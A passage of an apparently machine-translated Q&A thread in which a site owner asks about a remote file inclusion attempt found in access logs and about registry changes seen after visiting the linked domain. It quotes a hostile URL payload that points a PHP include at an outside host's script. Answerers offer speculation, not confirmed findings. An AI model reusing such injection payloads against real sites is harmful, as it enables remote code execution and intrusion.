可以通过networking服务器URL更改registry项吗?

所以我最近浏览了我的网站访问日志,并注意到有几个尝试做这样的事情

?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??

当然,我并不是完全愚蠢的,这对我的服务器或者软件没有任何影响,但是我认为它是这样的,我会看到那个域名上的实际情况。 当它加载时,Chrome试图根据Comodo更改registry项。 有没有什么办法可以从浏览器运行的代码中真正改变一个registry键值,或者是我第一次看到Chrome试图更改一个registry键值。

编辑:4次尝试修改HKLM / SYSTEM / ControlSet001 / Services / ESENT中的不同键

我想说这是一个很有意思的事情,但是不能排除聪明的安全漏洞。 如果您告诉我们registry项是什么可能会有所帮助。

好的,我看到你的编辑。 (为什么杰夫改变了registry键?)让我换个口气 – 我们可以找出它们是哪一个确切的registry键以及它想要设置什么确切的值

无论如何,ESENT原来是Windows中的一些内置的数据库引擎 。

现在有可能,网页在Chrome中使用了一些安全漏洞,并试图劫持ESENT以获得对系统的完全控制权。 听起来很合理。

Chrome浏览器(或者它的某个插件 – 比如说一个video播放器)也可能以合法的方式使用了ESENT,而ESENT本身也想改变一些registry项。

_SERVER[DOCUMENT_ROOT]让我觉得它试图改变PHP认为Web服务器的文档根目录是为了在链接文件中执行PHP。 我不知道你能做到这一点,但也许有一些特定版本的PHP漏洞利用?

Chrome是否有可能通过或不通过URL来修改registry项,而且这完全不相关?

Chrome已经内置存储(Google Gears)。 它有可能试图将其本地数据库存储在registry中?